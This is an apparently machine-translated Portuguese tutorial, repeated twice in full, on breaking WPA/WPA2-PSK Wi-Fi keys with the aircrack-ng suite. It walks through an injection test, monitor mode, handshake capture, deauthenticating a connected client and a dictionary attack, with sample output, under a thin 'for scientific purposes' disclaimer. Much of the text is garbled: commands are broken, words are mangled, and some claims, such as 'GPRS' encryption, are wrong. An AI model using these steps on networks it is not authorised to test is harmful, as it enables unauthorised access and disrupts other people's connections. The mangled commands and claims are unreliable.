ferramentas disponíveis para invadir uma rede sem fio, seja Windows ou Linux
Assim, não são recomendadas: Netstumbler, Kismet, Airsnort, CowPatty, ASLeap e Ethereal
Explique como descriptografar usando o WPA/WPA2-PSK criptografia GPRS através do trabalho de ataque de força bruta para extrair a chave de rede utilizando as últimas grupo Aricrack-ng.
As informações que você deve saber:
Este artigo explica como descriptografar as redes que utilizam Brortokol WPA/WPA2-PSK isso certifique-se da rede de destino usando este Albroortokol.
Nós usamos o ataque de força bruta para descriptografar WPA/WPA2-PSK porque a chave não é estático para a cobrança do IV é como se você deseja descriptografar WEP não vai funcionar, mas o que funciona aqui é o aperto de mão entre Alkleint e Ponto Alaakss AP.
Deve também saber que o fundamental é que você quer adivinhar pode ser um comprimento entre 8 e 63 de números e letras e até mesmo caracteres especiais.
O computador podem exercitar-se entre 50 e 300-chave na segunda, dependendo da velocidade do processador e da intensidade do sinal podem durar horas, que não duram dias ou meses. E se você quiser fazer um dicionário de todas as possibilidades de números e símbolos e personagens, grandes e pequenos, sei que se houvesse uma rede que usa a chave é composta por 5 caixas (números - símbolos - letras maiúsculas - minúsculas) e se o seu pode testar 1000 palavras por segundo, o tempo necessário para testar todas as possibilidades é de 4 meses.
Vou usar um sistema Linux eo pacote Aircrack-ng. E advertem que o artigo é para fins científicos.
Antes de começar o processo de fratura - ANTES DO CRAQUEAMENTO:
Deve ser Allowairls cartão que você está usando oferece suporte a injecção ou a injecção Para descobrir, use o seguinte comando:
aireplay-ng-9 e-JONA-a 00: de: af: da: c7: 00 wlan0
9 - significa a injeção de teste.
Nome E-Alaakss Point AP.
um endereço MAC do endereço de rede MAC.
wlan0 Allowairls cartão
Saída será da seguinte forma:
11:01:06 ath0 channel: 9 11:01:06 solicitações de investigação tentando transmitir ...
11:01:06 injeção está funcionando!
11:01:07 Encontrado 1 APs 11:01:07 Tentando solicitações de investigação dirigida ...
11:01:07 00:14:6 C: 7E: 40:80 - canal 9 - "JONA '
11:01:07 Ping (min / avg / max): 2.763ms/4.190ms/8.159ms
11:01:07 30/30: 100%
Os mais importantes duas linhas são o terceiro eo quarto aqui eo valor na última linha é de 100% e isso significa que podemos trabalhar a injeção da rede.
Deve estar perto o suficiente para a rede de destino para que você possa enviá-la Allbeckit lembrar que o sinal Alaakss Ponto forte do que a referência Allowairls cartão você tem que significa que se você pode receber de Allbeckit Alaakss Point Isso não significa que você pode enviar Allbeckit.
As medidas que vamos implementar - PASSOS FRACIONAMENTO:
Coloque no cartão! Wireless acompanhar a situação e no mesmo canal usado pelo ponto de Alaakss.
airodump-ng para obter o handshake de autenticação.
aireplay-ng Alkleint separar-se da rede.
Aircrack-ng para descriptografar o PSK usando o aperto de mão.
Processo de quebrar a criptografia da rede Allowairls - FRACIONAMENTO:
Comece o processo de desenvolvimento Allowairls cartão de monitorar o status de execução do seguinte comando:
ng airmon-start wlan0 9
wlan0: Kurt Allowairls
9: O canal usado pelo ponto de Alaakss
airodump-ng-c 9 - bssid 00: de: af: da: 00-w psk wlan0: c7
c canal usado pelo ponto Alaakss.
BSSID - endereço MAC do endereço de rede MAC.
w nome do arquivo será armazenado pelo Allbeckit ou caracteres que serão adicionados aos nomes de Allbeckit para distingui-los.
A coisa mais importante aqui é o aperto de mão e aparecerá no canto superior direito da tela. O dispositivo deve ser conectado à rede Kleint.
aireplay-ng -0 1-a 00:14:6 C: 7E: 40:80-c 00:00 F: B5: FD: FB: C2 wlan0
0 - significa deauthentication 1 é o número que será enviado deauthentication
um é o endereço MAC do Access Point endereço mac.
c-o endereço MAC do Kleint que serão demitidos.
E a saída de aproximadamente da seguinte forma:
11:09:28 Enviando deauth para a estação - STMAC: [00:00 F: B5: 34:30:30]
Execute o comando para quebrar a chave de criptografia de arquivos e extrair da rede:
Aircrack-ng-w password.lst-b 00: de: af: da: c7: 00 psk *. cap
W-chaves do arquivo que será testado
psk nome que escolhemos no primeiro passo dos pacotes.
E a saída será da seguinte forma:
Aircrack-ng 0,8 [00:00:00] 2 chaves testadas (37,20 k / s)
KEY FOUND! [123 456]
Master Key: CD 69 0D 11 8E AA BB AC C5 C5 CE 59 85 49 3E 7D A6 B8 4A 13 C5 72 82 38 ED C3 7E 2C 59 5E AB FD
Transcient-chave: 06 F8 BB F3 B1 55 EE AE AE 1F 1F 66 51 12 98 F8 CE 8A 9D A0 FC ED A6 DE BA 70 84 90 83 40 7E CD FF 1D 41 E1 65 17 93 0E 64 32 25 50 BF D5 4A 5E 2B 20 90 8C EA 32 15 A6 26 62 93 27 66 66 E0 71
EAPOL HMAC: D9 4E 27 5B 00 91 53 57 88 9C 66 C8 29 B1 D1 CB
Finalmente, o protocolo para descriptografar WPA-PSK é impossível se a chave é composta de mais de 20 check.
E alertam mais uma vez que a explicação para fins científicos
Assim, não são recomendadas: Netstumbler, Kismet, Airsnort, CowPatty, ASLeap e Ethereal
Explique como descriptografar usando o WPA/WPA2-PSK criptografia GPRS através do trabalho de ataque de força bruta para extrair a chave de rede utilizando as últimas grupo Aricrack-ng.
As informações que você deve saber:
Este artigo explica como descriptografar as redes que utilizam Brortokol WPA/WPA2-PSK isso certifique-se da rede de destino usando este Albroortokol.
Nós usamos o ataque de força bruta para descriptografar WPA/WPA2-PSK porque a chave não é estático para a cobrança do IV é como se você deseja descriptografar WEP não vai funcionar, mas o que funciona aqui é o aperto de mão entre Alkleint e Ponto Alaakss AP.
Deve também saber que o fundamental é que você quer adivinhar pode ser um comprimento entre 8 e 63 de números e letras e até mesmo caracteres especiais.
O computador podem exercitar-se entre 50 e 300-chave na segunda, dependendo da velocidade do processador e da intensidade do sinal podem durar horas, que não duram dias ou meses. E se você quiser fazer um dicionário de todas as possibilidades de números e símbolos e personagens, grandes e pequenos, sei que se houvesse uma rede que usa a chave é composta por 5 caixas (números - símbolos - letras maiúsculas - minúsculas) e se o seu pode testar 1000 palavras por segundo, o tempo necessário para testar todas as possibilidades é de 4 meses.
Vou usar um sistema Linux eo pacote Aircrack-ng. E advertem que o artigo é para fins científicos.
Antes de começar o processo de fratura - ANTES DO CRAQUEAMENTO:
Deve ser Allowairls cartão que você está usando oferece suporte a injecção ou a injecção Para descobrir, use o seguinte comando:
aireplay-ng-9 e-JONA-a 00: de: af: da: c7: 00 wlan0
9 - significa a injeção de teste.
Nome E-Alaakss Point AP.
um endereço MAC do endereço de rede MAC.
wlan0 Allowairls cartão
Saída será da seguinte forma:
11:01:06 ath0 channel: 9 11:01:06 solicitações de investigação tentando transmitir ...
11:01:06 injeção está funcionando!
11:01:07 Encontrado 1 APs 11:01:07 Tentando solicitações de investigação dirigida ...
11:01:07 00:14:6 C: 7E: 40:80 - canal 9 - "JONA '
11:01:07 Ping (min / avg / max): 2.763ms/4.190ms/8.159ms
11:01:07 30/30: 100%
Os mais importantes duas linhas são o terceiro eo quarto aqui eo valor na última linha é de 100% e isso significa que podemos trabalhar a injeção da rede.
Deve estar perto o suficiente para a rede de destino para que você possa enviá-la Allbeckit lembrar que o sinal Alaakss Ponto forte do que a referência Allowairls cartão você tem que significa que se você pode receber de Allbeckit Alaakss Point Isso não significa que você pode enviar Allbeckit.
As medidas que vamos implementar - PASSOS FRACIONAMENTO:
Coloque no cartão! Wireless acompanhar a situação e no mesmo canal usado pelo ponto de Alaakss.
airodump-ng para obter o handshake de autenticação.
aireplay-ng Alkleint separar-se da rede.
Aircrack-ng para descriptografar o PSK usando o aperto de mão.
Processo de quebrar a criptografia da rede Allowairls - FRACIONAMENTO:
Comece o processo de desenvolvimento Allowairls cartão de monitorar o status de execução do seguinte comando:
ng airmon-start wlan0 9
wlan0: Kurt Allowairls
9: O canal usado pelo ponto de Alaakss
airodump-ng-c 9 - bssid 00: de: af: da: 00-w psk wlan0: c7
c canal usado pelo ponto Alaakss.
BSSID - endereço MAC do endereço de rede MAC.
w nome do arquivo será armazenado pelo Allbeckit ou caracteres que serão adicionados aos nomes de Allbeckit para distingui-los.
A coisa mais importante aqui é o aperto de mão e aparecerá no canto superior direito da tela. O dispositivo deve ser conectado à rede Kleint.
aireplay-ng -0 1-a 00:14:6 C: 7E: 40:80-c 00:00 F: B5: FD: FB: C2 wlan0
0 - significa deauthentication 1 é o número que será enviado deauthentication
um é o endereço MAC do Access Point endereço mac.
c-o endereço MAC do Kleint que serão demitidos.
E a saída de aproximadamente da seguinte forma:
11:09:28 Enviando deauth para a estação - STMAC: [00:00 F: B5: 34:30:30]
Execute o comando para quebrar a chave de criptografia de arquivos e extrair da rede:
Aircrack-ng-w password.lst-b 00: de: af: da: c7: 00 psk *. cap
W-chaves do arquivo que será testado
psk nome que escolhemos no primeiro passo dos pacotes.
E a saída será da seguinte forma:
Aircrack-ng 0,8 [00:00:00] 2 chaves testadas (37,20 k / s)
KEY FOUND! [123 456]
Master Key: CD 69 0D 11 8E AA BB AC C5 C5 CE 59 85 49 3E 7D A6 B8 4A 13 C5 72 82 38 ED C3 7E 2C 59 5E AB FD
Transcient-chave: 06 F8 BB F3 B1 55 EE AE AE 1F 1F 66 51 12 98 F8 CE 8A 9D A0 FC ED A6 DE BA 70 84 90 83 40 7E CD FF 1D 41 E1 65 17 93 0E 64 32 25 50 BF D5 4A 5E 2B 20 90 8C EA 32 15 A6 26 62 93 27 66 66 E0 71
EAPOL HMAC: D9 4E 27 5B 00 91 53 57 88 9C 66 C8 29 B1 D1 CB
Finalmente, o protocolo para descriptografar WPA-PSK é impossível se a chave é composta de mais de 20 check.
E alertam mais uma vez que a explicação para fins científicos
Comment